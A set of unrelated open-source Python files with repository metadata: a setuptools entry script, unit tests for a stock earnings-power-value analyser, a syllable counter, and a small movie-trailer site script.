cc8da95fe71004d8514e3893a382112d58a95551 | ed2b2929b028f7b53f38ae72ad58d2af407c9c72 | /venv/Scripts/easy_install-script.py | bd6eda98cad82b59c89f3db92439ff31f06e7336 | [] | no_license | LiuzJY/Locust | 6a34dd089a70cceb3bc1b46e04ec02faf60cb6bf | 2ca251445fa16328eb6ff258577b5781a3547a37 | refs/heads/master | 2022-11-13T01:19:55.112076 | 2020-07-10T09:41:34 | 2020-07-10T09:41:34 | 262,478,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | #!"D:\PyCharm 2018.3.1\Workpace\locust\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"2212627962@qq.com"
] | 2212627962@qq.com |
93ff2aca5849d1c9ab4f4890838447bd1918b640 | 50bb1636ce4cd745ca275c32948bc74b089127bb | /project_one/src/item/__init__.py | d22f598ff891034bd075310c9dd502c89380bdee | [] | no_license | silaslxy/sunshine | 82cc08bb3d264a39f56762998e0a9af677516e99 | 1252be429da5dfd6ad26330924ccb8407c60a52d | refs/heads/master | 2023-04-22T05:03:50.361022 | 2020-07-09T06:31:31 | 2020-07-09T06:31:31 | 277,517,964 | 0 | 0 | null | 2021-05-13T20:58:03 | 2020-07-06T10:59:44 | Python | UTF-8 | Python | false | false | 184 | py | # coding: utf-8
# ----------------------------------
# @Author: xiaosiwen
# @Date: 2020/7/6 16:44
# @Desc:
# ----------------------------------
from item.views import bp as model_a_bp
| [
"xsw@lianantech.com"
] | xsw@lianantech.com |
8153a3ae78cbde795f5f302dc726b7210de73588 | 64a5b1d69e328abb217ef2b007ab8ed6fb8d3692 | /tests/testEPVanalyser.py | 146b4f8513e2480f173afc1b24e082493031a512 | [] | no_license | markhocky/Investing | 5e5c31a34d66be65d8251475ab790451a7a6c53a | c37a048634fafaf46b9f096a906e92c9005f6164 | refs/heads/master | 2020-04-04T10:40:49.087228 | 2018-05-28T02:22:35 | 2018-05-28T02:22:35 | 55,501,355 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 24,401 | py | import unittest
import pandas
import math
import numpy as np
from sklearn.linear_model import LinearRegression
from mock import Mock, call
from StockAnalysis.Analysers import EPVanalyser, FinanceAnalyst
class Test_EstimateIncomeAndExpenses(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.zero_series = pandas.Series([0.0] * len(years), index = years)
self.income.sales = pandas.Series([216892.6, 114182.9, 114695.4, 152837.9, 142511.6], index = years)
self.income.DandA = pandas.Series([4169.4, 1639.2, 974.8, 685.7, 542.4], index = years)
self.income.depreciation = pandas.Series([2169.4, 1200.2, 800.8, 650.7, 500.4], index = years)
self.income.amortization = self.income.DandA - self.income.depreciation
interest_earned = pandas.Series([1117.3, 1264.7, 1491.0, 2191.8, 955.8], index = years)
interest_expense = pandas.Series([58.9, 81.0, 104.0, 88.1, 44.0], index = years)
self.income.net_interest = interest_earned - interest_expense
self.income.pretax = pandas.Series([17195.9, 16786.6, 11476.0, 19858.1, 29247.5], index = years)
self.income.unusual_expense = pandas.Series([0.0, 0.0, 0.0, 1000.0, 0.0], index = years)
self.income.non_operating_income = pandas.Series([4000.0, 17000.0, 4000.0, 18000.0, 0.0], index = years)
self.balance.assets = pandas.Series([102972.0, 81903.0, 63604.2, 64117.2, 68824.9], index = years)
self.balance.PPE = pandas.Series([3514.6, 2040.9, 2672.0, 2191.9, 1972.6], index = years)
self.balance.intangibles = pandas.Series([552.7, 3647.7, 0.0, 0.0, 0.0], index = years)
self.balance.other_intangibles = pandas.Series([52.70, 3595.0, 0.0, 0.0, 0.0], index = years)
self.balance.cash = pandas.Series([64583.0, 33542.3, 16218.7, 33861.2, 36014.1], index = years)
self.balance.debt = pandas.Series([1104.3, 535.4, 908.3, 479.0, 928.5], index = years)
self.cash.capex_assets = pandas.Series([1797.3, 43.9, 724.1, 908.3, 1081.1], index = years)
self.cash.capex_other = pandas.Series([102.0, 3000.0, 0.0, 0.0, 0.0], index = years)
self.cash.asset_sales = pandas.Series([0.0, 20.0, 0.0, 0.0, 52.0], index = years)
self.cash.debt_reduction = pandas.Series([168.0, 358.0, 301.0, 449.5, 277.0], index = years)
self.cash.change_in_working_capital = pandas.Series([1680.0, -1358.0, 301.0, 4492.5, -2277.0], index = years)
self.lease_financing = pandas.Series([737.4, -15.0, 730.7, 0.0, 0.0], index = years)
self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
self.asset_maintenance = pandas.Series([1850.0, 1658.0, 650.0, 1100.0, 980.0], index = years)
self.financials = FinanceAnalyst(self.income, self.balance, self.cash)
def test_AvgCapitalToSales(self):
avg_capital_sales_ratio = self.financials.cap_sales_ratio()
yearly_ratios = (self.balance.PPE + self.balance.intangibles) / self.income.sales
self.assertEqual(avg_capital_sales_ratio, yearly_ratios.mean())
self.assertAlmostEqual(avg_capital_sales_ratio, 0.024, places = 3)
def test_EstimateGrowthCapexFromSales(self):
sales_change = self.income.sales.diff(periods = -1)
sales_change = sales_change.fillna(method = "pad")
cap_sales_ratio = 0.05
expected = sales_change * cap_sales_ratio
expected[expected < 0] = 0
self.financials.cap_sales_ratio = Mock(return_value = cap_sales_ratio)
actual = self.financials.growth_capex()
self.assertTrue(actual.equals(expected))
def test_ImpliedCapex(self):
capital_base_change = (self.balance.PPE + self.balance.intangibles).diff(periods = -1)
capital_base_change = capital_base_change.fillna(method = "pad")
expected = capital_base_change + self.income.DandA
actual = self.financials.implied_capex()
self.assertTrue(actual.equals(expected))
def test_ExpendedDepreciation(self):
capital_base = self.financials.capital_base()
capital_base_change = self.financials.series_diff(capital_base)
capital_base_change[capital_base_change > 0] = 0
expected = self.income.DandA + capital_base_change
actual = self.financials.expended_depreciation()
self.assertTrue(actual.equals(expected))
def test_NetAssetCashExpenditures(self):
expected = self.cash.capex_assets
actual = self.financials.asset_capex()
self.assertTrue(actual.equals(expected))
def test_LeaseFinancingCosts(self):
debt_change = self.financials.series_diff(self.financials.totalDebt())
expected = self.cash.debt_reduction + debt_change
actual = self.financials.lease_financing()
self.assertTrue(actual.equals(expected))
def test_NetPPEMaintenanceCashflows(self):
self.financials.lease_financing = Mock(return_value = self.lease_financing)
PPE_change = self.financials.PPE_change_net_sales()
net_cash_capex = self.financials.asset_capex()
expected = self.lease_financing + net_cash_capex - PPE_change
actual = self.financials.PPE_maintenance()
self.assertTrue(actual.equals(expected))
def test_PPEmaintenanceWithZeroCashflowError(self):
self.financials.asset_capex = Mock(return_value = self.zero_series)
self.financials.lease_financing = Mock(return_value = self.zero_series)
expected = self.income.depreciation
actual = self.financials.PPE_maintenance()
self.assertTrue(actual.equals(expected))
def test_IntangiblesMaintenanceCashflows(self):
intangibles_change = self.financials.series_diff(self.balance.other_intangibles)
intangibles_change[intangibles_change < 0] = 0
capex_ex_growth = self.cash.capex_other - intangibles_change
capex_ex_growth[capex_ex_growth < 0] = 0
intangibles_spend_pct = capex_ex_growth / self.balance.other_intangibles
expected = self.balance.other_intangibles * intangibles_spend_pct.mean()
actual = self.financials.intangibles_maintenance()
self.assertTrue(actual.equals(expected))
def test_IntangibleMaintenanceWithZeroCashflowError(self):
self.cash.capex_other = self.zero_series
expected = self.income.amortization
actual = self.financials.intangibles_maintenance()
self.assertTrue(actual.equals(expected))
def test_InvestedCapital(self):
net_cash = self.balance.cash - 0.015 * self.income.sales
expected = self.balance.assets - net_cash
invested_capital = self.financials.investedCapital()
self.assertTrue(invested_capital.equals(expected))
def test_NetUnusuals(self):
unusuals = self.income.unusual_expense - self.income.non_operating_income
expected = unusuals - unusuals.mean()
actual = self.financials.net_unusuals()
self.assertTrue(actual.equals(expected))
def test_NonCashExpenses(self):
expected = self.income.DandA
actual = self.financials.non_cash_expenses()
self.assertTrue(actual.equals(expected))
def test_TotalMaintenanceExpense(self):
expected = (self.financials.PPE_maintenance() +
self.financials.intangibles_maintenance() + self.financials.working_capital_requirements())
actual = self.financials.maintenance_expense()
self.assertTrue(actual.equals(expected))
def test_CalculateEBIT(self):
expected = self.income.pretax - self.income.net_interest
actual = self.financials.EBIT()
self.assertTrue(actual.equals(expected))
def test_CalculateAdjustedEarnings(self):
self.financials.asset_maintenance = Mock(return_value = self.asset_maintenance)
EBIT = self.financials.EBIT()
expected = (EBIT + self.financials.net_unusuals()) * 0.7 + self.financials.non_cash_expenses() - self.asset_maintenance
adj_earnings = self.financials.ownerEarnings()
self.assertTrue(adj_earnings.equals(expected))
class Test_EstimatesOfFinancing(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.cash.dividends_total = pandas.Series([12784.7, 9000.0, 9000.0, 12000.0, 19000.0], index = years)
self.income.num_shares_diluted = pandas.Series([153646.0, 152881.0, 151569.0, 150000.0, 125932.0], index = years)
self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
self.invested_capital = pandas.Series([130000.0, 120000, 67000.0, 124000, 195000.0], index = years)
self.financials = FinanceAnalyst(self.income, self.balance, self.cash)
self.financials.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financials.investedCapital = Mock(return_value = self.invested_capital)
def test_DividendRate(self):
expected = self.adjusted_earnings / self.cash.dividends_total
div_rate = self.financials.dividend_rate()
self.assertTrue(div_rate.equals(expected))
def test_CapitalInvestmentPercentage(self):
expected = (self.adjusted_earnings - self.cash.dividends_total) / self.invested_capital
invest_pct = self.financials.capitalInvestmentPct()
self.assertTrue(invest_pct.equals(expected))
def test_DilutionGrowth(self):
shares_growth = self.income.num_shares_diluted.pct_change(periods = -1)
dilution_growth = self.financials.dilutionGrowth()
self.assertEqual(dilution_growth, shares_growth.mean())
self.assertAlmostEqual(dilution_growth, 0.0538, places = 4)
class Test_CalculateWACC(unittest.TestCase):
def setUp(self):
years = ["2015", "2014", "2013", "2012", "2011"]
self.income = Mock()
self.balance = Mock()
self.cash = Mock()
self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
self.adjusted_earnings = pandas.Series([13863.84, 11931.48, 6634.01, 12389.30, 19480.11], index = years)
self.invested_capital = pandas.Series([130000.0, 120000, 67000.0, 124000, 195000.0], index = years)
self.assets = pandas.Series([102972.0, 81903.0, 63604.2, 64117.2, 68824.9], index = years)
self.debt = pandas.Series([1104.3, 535.4, 908.3, 479.0, 928.5], index = years)
self.free_cash = pandas.Series([140.3, 52.2, 85.3, 44.0, 28.5], index = years)
self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
self.financial_analyst.investedCapital = Mock(return_value = self.invested_capital)
self.financial_analyst.totalAssets = Mock(return_value = self.assets)
self.financial_analyst.totalDebt = Mock(return_value = self.debt)
self.financial_analyst.netCash = Mock(return_value = self.free_cash)
self.analyser = EPVanalyser(self.financial_analyst)
def test_AdjustedReturnOnInvestedCapital(self):
adj_ROIC = self.analyser.owner_earnings() / self.financial_analyst.investedCapital()
trend_ROIC = self.financial_analyst.series_trend(adj_ROIC)
mean_rtn = trend_ROIC["2015"]
expected_std = (adj_ROIC - trend_ROIC).std()
expected_mean = mean_rtn - 1.65 * (expected_std / (5.0 ** 0.5))
adj_ROIC_mean = self.analyser.ROIC_mean()
adj_ROIC_std = self.analyser.ROIC_std()
self.assertEqual(adj_ROIC_std, expected_std)
self.assertEqual(adj_ROIC_mean, expected_mean)
def test_OptimalF(self):
min_denom = 0.01
adj_frac = 1.0 / 6.0
mean = self.analyser.ROIC_mean()
std = self.analyser.ROIC_std()
expectedF = adj_frac * mean / max(std ** 2 - mean ** 2, min_denom)
self.assertEqual(self.analyser.optF(), expectedF)
def test_OptimalFwithNegReturn(self):
min_denom = 0.01
adj_frac = 1.0 / 6.0
min_F = 0.001
self.analyser.ROIC_mean = Mock(return_value = -0.25)
mean = self.analyser.ROIC_mean()
std = self.analyser.ROIC_std()
expectedF = max(adj_frac * mean / max(std ** 2 - mean ** 2, min_denom), min_F)
self.assertEqual(self.analyser.optF(), expectedF)
def test_ActualF(self):
current_debt = self.debt["2015"]
current_free_cash = self.free_cash["2015"]
net_debt = current_debt - current_free_cash
current_assets = self.assets["2015"]
expectedF = current_assets / (current_assets - net_debt)
self.assertEqual(self.analyser.actF(), expectedF)
def test_WACCbaseline(self):
debt_cost = 0.09
equity_cost = 0.20
self.analyser.debt_cost = debt_cost
self.analyser.equity_premium = 0.11
self.analyser.equity_base_cost = 0.09
f_opt = 3.5
self.analyser.optF = Mock(return_value = f_opt)
self.assertEqual(self.analyser.WACC(equity_cost), equity_cost * (1 / f_opt) + debt_cost * ((f_opt - 1) / f_opt))
def test_ProbabilityOfLoss(self):
acceptable_DD = 0.25
self.analyser.acceptable_DD = acceptable_DD
mean_rtn = 0.212
std_rtn = 0.159
self.analyser.ROIC_mean = Mock(return_value = mean_rtn)
self.analyser.ROIC_std = Mock(return_value = std_rtn)
optF = 3.5
expected_prob = math.exp((-2.0 * optF * mean_rtn * acceptable_DD) / (optF * std_rtn) ** 2)
self.assertEqual(self.analyser.loss_probability(optF), expected_prob)
def test_LeveragedEquityCost(self):
prob_at_opt = 0.301
prob_at_act = 0.016
loss_prob_mock = Mock()
loss_prob_mock.side_effect = [prob_at_opt, prob_at_act]
self.analyser.loss_probability = loss_prob_mock
leverage_ratio = prob_at_act / prob_at_opt
equity_base_cost = 0.09
equity_premium = 0.11
self.analyser.equity_premium = equity_premium
self.analyser.equity_base_cost = equity_base_cost
expected_cost = equity_base_cost + leverage_ratio * equity_premium
equity_cost = self.analyser.equity_cost()
self.assertEqual(equity_cost, expected_cost)
self.assertAlmostEqual(equity_cost, 0.096, places = 3)
class Test_GrowthMultiple(unittest.TestCase):
    """Tests for EPVanalyser.growth_multiple in normal, capped and negative-return cases."""

    def setUp(self):
        years = ["2015", "2014", "2013", "2012", "2011"]
        # Financial statements are mocked; the analyser only sees the stubbed series below.
        self.income = Mock()
        self.balance = Mock()
        self.cash = Mock()
        self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
        self.analyser = EPVanalyser(self.financial_analyst)
        self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
        self.invested_capital = pandas.Series([41642.4, 50073.4, 49105.9, 32548.6, 34948.5], index = years)
        self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
        self.financial_analyst.investedCapital = Mock(return_value = self.invested_capital)

    def test_GrowthMultiple(self):
        """Base case: multiple = (1 - (I/WACC)*(WACC/R)) / (1 - I/WACC)."""
        WACC = 0.093
        R = 0.212  # mean return
        I = 0.026  # cash investment percentage
        expected = (1 - (I / WACC)*(WACC / R)) / (1 - (I / WACC))
        growth_mult = self.analyser.growth_multiple(WACC, I, R)
        self.assertEqual(growth_mult, expected)
        self.assertAlmostEqual(growth_mult, 1.218, places = 3)

    def test_GrowthMultipleCap(self):
        """The investment fraction I/WACC is expected to be capped at 0.75."""
        WACC = 0.10
        R = 0.15
        I = 0.14
        # NOTE(review): 'expected' is unused; the test only checks the literal value.
        expected = (1 - 0.75 * WACC / R) / (1 - 0.75)
        growth_mult = self.analyser.growth_multiple(WACC, I, R)
        self.assertAlmostEqual(growth_mult, 2.000, places = 3)

    def test_GrowthMultipleNegRtn(self):
        """Negative mean returns are expected to use the absolute WACC/R ratio."""
        WACC = 0.25
        R = -0.025
        I = 0.05
        # NOTE(review): 'expected' is unused; the test only checks the literal value.
        expected = (1 - (I / WACC) * abs(WACC / R)) / (1 - (I / WACC))
        growth_mult = self.analyser.growth_multiple(WACC, I, R)
        self.assertAlmostEqual(growth_mult, -1.250, places = 3)
class Test_AdjustmentForCyclicality(unittest.TestCase):
    """Tests for smoothing cyclical earnings via trend and mean-ROIC adjustments."""

    def setUp(self):
        years = ["2015", "2014", "2013", "2012", "2011"]
        self.income = Mock()
        self.balance = Mock()
        self.cash = Mock()
        # Concrete income-statement series feed the FinanceAnalyst under test.
        self.income.sales = pandas.Series([216892.6, 114182.9, 114695.4, 152837.9, 142511.6], index = years)
        self.income.COGS = pandas.Series([193088.80, 94391.70, 96937.40, 128595.40, 106295.80], index = years)
        self.income.SGA = pandas.Series([8135.10, 7170.40, 7966.20, 6447.00, 8320.20], index = years)
        self.income.DandA = pandas.Series([4169.4, 1639.2, 974.8, 685.7, 542.4], index = years)
        self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
        self.analyser = EPVanalyser(self.financial_analyst)
        self.adjusted_earnings = pandas.Series([11150.46, 7893.12, 5666.38, 12404.10, 19816.02], index = years)
        self.maintenance_capex = pandas.Series([2287.83, 1973.08, 1658.33, 1343.58, 1028.83], index = years)
        self.invested_capital = pandas.Series([41642.39, 50073.44, 49105.93, 32548.57, 34948.47], index = years)
        self.adjusted_ROIC_mean = 0.196
        self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
        self.financial_analyst.expended_depreciation = Mock(return_value = self.maintenance_capex)
        self.financial_analyst.investedCapital = Mock(return_value = self.invested_capital)
        self.analyser.ROIC_mean = Mock(return_value = self.adjusted_ROIC_mean)

    def test_TrendEarnings(self):
        """trendEarnings should delegate to series_trend on the owner earnings."""
        expected = self.financial_analyst.series_trend(self.adjusted_earnings)
        trend_earnings = self.financial_analyst.trendEarnings()
        self.assertTrue(trend_earnings.equals(expected))

    def test_EarningsOnROIC(self):
        """ROIC-adjusted earnings = invested capital * mean ROIC."""
        expected = self.invested_capital * self.adjusted_ROIC_mean
        adj_earnings = self.analyser.ROIC_adjusted_earnings()
        self.assertTrue(adj_earnings.equals(expected))
class Test_EPVcalcs(unittest.TestCase):
    """Tests for the core EPV (earnings power value) formula and per-share conversion."""

    def setUp(self):
        years = ["2015", "2014", "2013", "2012", "2011"]
        # Statement objects are mocked; the analyser only sees the stubbed series below.
        self.income = Mock()
        self.balance = Mock()
        self.cash = Mock()
        self.financial_analyst = FinanceAnalyst(self.income, self.balance, self.cash)
        self.analyser = EPVanalyser(self.financial_analyst)
        self.adjusted_earnings = pandas.Series([8143.91, 9792.75, 6378.77, 6365.45, 6834.80], index = years)
        self.trend_earnings = pandas.Series([75010.89, 61676.55, 48342.21, 35007.87, 21673.53], index = years)
        self.net_cash = pandas.Series([61329.61, 31829.56, 14498.27, 31568.63, 33876.43], index = years)
        self.debt = pandas.Series([1104.3, 535.4, 908.3, 479.0, 928.5], index = years)
        self.num_shares_diluted = pandas.Series([153646.0, 152881.0, 151569.0, 150000.0, 125932.0], index = years)
        self.financial_analyst.ownerEarnings = Mock(return_value = self.adjusted_earnings)
        self.financial_analyst.trendEarnings = Mock(return_value = self.trend_earnings)
        self.financial_analyst.netCash = Mock(return_value = self.net_cash)
        self.financial_analyst.totalDebt = Mock(return_value = self.debt)
        self.financial_analyst.numSharesDiluted = Mock(return_value = self.num_shares_diluted)

    def test_EPVcalculation(self):
        """EPV = ((earnings / WACC) * growth - debt + net cash) * dilution."""
        earnings = self.adjusted_earnings
        WACC = 0.0945
        growth = 1.057
        dilution = 0.9462
        expected = ((earnings / WACC) * growth - self.debt + self.net_cash) * dilution
        EPV = self.analyser.EPV(earnings, WACC, growth, dilution)
        self.assertTrue(EPV.equals(expected))
        self.assertAlmostEqual(EPV["2015"], 143175.63, places = 2)

    def test_EPVcalculationBase(self):
        """With growth = dilution = 1 the formula reduces to earnings/WACC - debt + cash."""
        earnings = self.adjusted_earnings
        WACC = 0.0945
        expected = (earnings / WACC) - self.debt + self.net_cash
        EPV = self.analyser.EPV(earnings, WACC, 1, 1)
        self.assertTrue(EPV.equals(expected))
        self.assertAlmostEqual(EPV["2015"], 146404.25, places = 2)

    def test_EPVcalculationTable(self):
        """EPV must also work column-wise on a DataFrame of earnings scenarios."""
        earnings = pandas.DataFrame({"Base" : self.adjusted_earnings,
                                     "Other" : self.adjusted_earnings})
        WACC = 0.0945
        expected = (earnings / WACC).sub(self.debt, axis = "index").add(self.net_cash, axis = "index")
        EPV = self.analyser.EPV(earnings, WACC, 1, 1)
        self.assertTrue(EPV.equals(expected))
        self.assertAlmostEqual(EPV["Base"]["2015"], 146404.25, places = 2)

    def test_EPVperShare(self):
        """per_share divides the EPV series by the diluted share count."""
        earnings = self.adjusted_earnings
        WACC = 0.0945
        EPV = self.analyser.EPV(earnings, WACC, 1, 1)
        expected = EPV / self.num_shares_diluted
        EPV_share = self.analyser.per_share(EPV)
        self.assertTrue(EPV_share.equals(expected))
        self.assertAlmostEqual(EPV_share["2015"], 0.953, places = 3)

    def test_EPVperShareTable(self):
        """per_share on a DataFrame divides every column by the share count."""
        earnings = pandas.DataFrame({"Base" : self.adjusted_earnings,
                                     "Other" : self.adjusted_earnings})
        WACC = 0.0945
        EPV = self.analyser.EPV(earnings, WACC, 1, 1)
        expected = EPV.div(self.num_shares_diluted, axis = "index")
        EPV_share = self.analyser.per_share(EPV)
        self.assertTrue(EPV_share.equals(expected))
        self.assertAlmostEqual(EPV_share["Base"]["2015"], 0.953, places = 3)
class Test_EPVvariations(unittest.TestCase):
    """Check each EPV_* variant forwards the right earnings/WACC/growth/dilution to EPV()."""

    def setUp(self):
        # Sentinel strings stand in for the different earnings series.
        self.earnings = "adjusted_earnings"
        self.trend = "trend_earnings"
        self.ROIC_earnings = "ROIC_earnings"
        self.min_earnings = "min_earnings"
        self.max_earnings = "max_earnings"
        self.earnings_table = Mock()
        self.earnings_table.min = Mock(return_value = self.min_earnings)
        self.earnings_table.max = Mock(return_value = self.max_earnings)
        return_series = pandas.Series([0] * 3)
        self.growth = 2.0
        self.dilution = 1 - 0.05
        self.WACC = 0.12
        self.WACC_base = 0.18
        self.analyser = EPVanalyser(Mock())
        # Every collaborator is mocked so only the argument wiring is under test.
        self.analyser.owner_earnings = Mock(return_value = self.earnings)
        self.analyser.trend_earnings = Mock(return_value = self.trend)
        self.analyser.ROIC_adjusted_earnings = Mock(return_value = self.ROIC_earnings)
        self.analyser.earnings_table = Mock(return_value = self.earnings_table)
        self.analyser.EPV = Mock(return_value = return_series)
        self.analyser.WACC = Mock(return_value = self.WACC)
        self.analyser.WACC_base = Mock(return_value = self.WACC_base)
        self.analyser.dilution = Mock(return_value = self.dilution)
        self.analyser.growth_multiple = Mock(return_value = self.growth)

    def test_EPVbase(self):
        EPV = self.analyser.EPV_base()
        self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC_base, growth = 1, dilution = 1)

    def test_EPVlevered(self):
        EPV = self.analyser.EPV_levered()
        self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC, growth = 1, dilution = 1)

    def test_EPVgrowth(self):
        EPV = self.analyser.EPV_growth()
        self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC_base, growth = self.growth, dilution = 1)

    def test_EPVcyclic(self):
        EPV = self.analyser.EPV_cyclic()
        self.analyser.EPV.assert_called_once_with(self.ROIC_earnings, self.WACC_base, growth = 1, dilution = 1)

    def test_EPVdiluted(self):
        EPV = self.analyser.EPV_diluted()
        self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC_base, growth = 1, dilution = self.dilution)

    def test_EPVadjusted(self):
        EPV = self.analyser.EPV_adjusted()
        self.analyser.EPV.assert_called_once_with(self.earnings, self.WACC, growth = self.growth, dilution = self.dilution)

    def test_EPVmin(self):
        # Worst case: lowest earnings, base WACC, no growth, with dilution.
        EPV = self.analyser.EPV_minimum()
        self.analyser.EPV.assert_called_once_with(self.min_earnings, self.WACC_base, 1, self.dilution)

    def test_EPVmax(self):
        # Best case: highest earnings, levered WACC, growth, no dilution.
        EPV = self.analyser.EPV_maximum()
        self.analyser.EPV.assert_called_once_with(self.max_earnings, self.WACC, self.growth, 1)
# Run the whole test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| [
"markhocky@gmail.com"
] | markhocky@gmail.com |
421a3548c2d98a5e84c8119092e85a215117d19c | 64e9565bd7ca0cab875f2549fa40781061926568 | /source/countsyl.py | 781f8c24c4fca600e4dbfe0186df22cf3ebde5d8 | [] | no_license | carlyrobison/sonnetspoofer | 9dcf0a5d1193fe6623ab80c61f2b2adae2d7889f | 3b18004b9e5c6c679cb49664500b1fb878c0484d | refs/heads/master | 2021-01-20T03:17:30.783296 | 2017-02-28T01:55:56 | 2017-02-28T01:55:56 | 82,864,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,908 | py | # From https://github.com/hyperreality/Poetry-Tools/blob/master/poetrytools/countsyl.py
#!//usr/bin/env python
# Count syllables in a word.
#
# Doesn't use any fancy knowledge, just a few super simple rules:
# a vowel starts each syllable;
# a doubled vowel doesn't add an extra syllable;
# two or more different vowels together are a diphthong,
# and probably don't start a new syllable but might;
# y is considered a vowel when it follows a consonant.
#
# Even with these simple rules, it gets results far better
# than python-hyphenate with the libreoffice hyphenation dictionary.
#
# Copyright 2013 by Akkana Peck http://shallowsky.com.
# Share and enjoy under the terms of the GPLv2 or later.
import sys
verbose = False
def count_syllables(word):
    """Return a conservative (minimum) syllable count for *word*.

    Heuristics only: each new vowel group starts a syllable, a doubled
    vowel does not add one, differing adjacent vowels are treated as a
    possible diphthong (tracked in the max estimate), 'y' acts as a
    vowel when it follows a consonant, and a trailing silent 'e' is
    discounted from the minimum estimate.
    """
    # Fix: the original indexed word[-1] unconditionally and crashed on "".
    if not word:
        return 0

    vowels = ['a', 'e', 'i', 'o', 'u']

    on_vowel = False
    in_diphthong = False
    minsyl = 0
    maxsyl = 0
    lastchar = None

    word = word.lower()
    for c in word:
        is_vowel = c in vowels
        # (Removed dead "on_vowel == None" branch: on_vowel is always a bool here.)

        # y is a special case: it counts as a vowel only after a consonant.
        if c == 'y':
            is_vowel = not on_vowel

        if is_vowel:
            if not on_vowel:
                # We weren't on a vowel before.
                # Seeing a new vowel bumps the syllable count.
                minsyl += 1
                maxsyl += 1
            elif on_vowel and not in_diphthong and c != lastchar:
                # We were already in a vowel group.
                # Don't increment anything except the max count,
                # and only do that once per diphthong.
                in_diphthong = True
                maxsyl += 1

        on_vowel = is_vowel
        lastchar = c

    # Special case: a trailing silent 'e' is discounted from the minimum.
    if word[-1] == 'e':
        minsyl -= 1
    # If it ended with a consonant followed by y, count that as a syllable
    # in the max estimate.
    if word[-1] == 'y' and not on_vowel:
        maxsyl += 1

    return minsyl
"sharikak54@gmail.com"
] | sharikak54@gmail.com |
da63497011d0f31d066f5ff77a5e4f79c6dbbdb3 | 5b2ab5cda3d807ead96c69b126efd2574d287f95 | /entertainment_center.py | c18e181aebf8dcd68459131ebca7ca6f2ab01d0b | [
"MIT"
] | permissive | egpaul/fresh-tomatoes | 95fa771576722b075c624b6460e0bf6f98486f77 | 9bd0e024e31fed3e3de9d3f0ff0420e9d89985a4 | refs/heads/master | 2021-05-15T10:44:36.190250 | 2017-10-25T16:33:58 | 2017-10-25T16:33:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,796 | py | import fresh_tomatoes
import media
# Goodfellas Movie: Movie title, storyline, poster image, and trailer
goodfellas = media.Movie(
"Goodfellas",
"A young man grows up in the mob and works very hard to advance himself"
"through the ranks",
"https://s-media-cache-ak0.pinimg.com/originals/17/34/15/173415b43512c20f4ec490909b81a82c.jpg", # NOQA
"https://youtu.be/qWhS8Pjf-9c"
)
# Casino Movie: Movie title, storyline, poster image, and trailer
casino = media.Movie(
"Casino",
"In early-1970s Las Vegas, low-level mobster Sam Ace Rothstein (Robert De"
"Niro) gets tapped by his bosses to head the Tangiers Casino. ",
"http://www.impawards.com/1995/posters/casino_ver1.jpg",
"https://youtu.be/EGNx3ilNB80"
)
# A Bronx Tale Movie: Movie title, storyline, poster image, and trailer
a_bronx_tale = media.Movie(
"A Bronx Tale",
"As he grows into a teenager on the streets of the Bronx in the socially"
"turbulent 1960s, Calogero (Lillo Brancato) gets taken under the wing of"
"neighborhood mobster Sonny (Chazz Palminteri).",
"http://is1.mzstatic.com/image/thumb/Video52/v4/7c/ed/9b/7ced9bfb-50f7-ca84-2757-3d53adf48d1e/source/1200x630bb.jpg", # NOQA
"https://youtu.be/iPaMz7DkGdw"
)
# Donnie Brasco Movie: Movie title, storyline, poster image, and trailer
donnie_brasco = media.Movie(
"Donnie Brasco",
"Joseph Pistone (Johnny Depp) is an FBI agent who has infiltrated one of"
"the major New York Mafia families and is living under the name Donnie"
"Brasco.",
"https://s-media-cache-ak0.pinimg.com/originals/7f/99/8d/7f998df079fc950a9779ca23ff9b5836.jpg", # NOQA
"https://youtu.be/-LxfpyZXJiI"
)
# The Godfather: Movie title, storyline, poster image, and trailer
the_godfather = media.Movie(
"The Godfather",
"The aging patriarch of an organized crime dynasty transfers control of"
"his clandestine",
"http://static.metacritic.com/images/products/movies/3/47c2b1f35087fc23c5ce261bbc3ad9e0.jpg", # NOQA
"https://youtu.be/8V2k2YQEQJ4"
)
# The Departed: Movie title, storyline, poster image, and trailer
the_departed = media.Movie(
"The Departed",
"An undercover cop and a mole in the police attempt to identify each"
"other.",
"http://static.rogerebert.com/uploads/movie/movie_poster/the-departed-2007/large_tGLO9zw5ZtCeyyEWgbYGgsFxC6i.jpg", # NOQA
"https://youtu.be/SGWvwjZ0eDc")
# The Departed: Movie title, storyline, poster image, and trailer
# Sets the movies to be passed to the media file
movies = [
goodfellas,
casino,
a_bronx_tale,
donnie_brasco,
the_godfather,
the_departed
]
# Opens the HTML file in a webbrowser
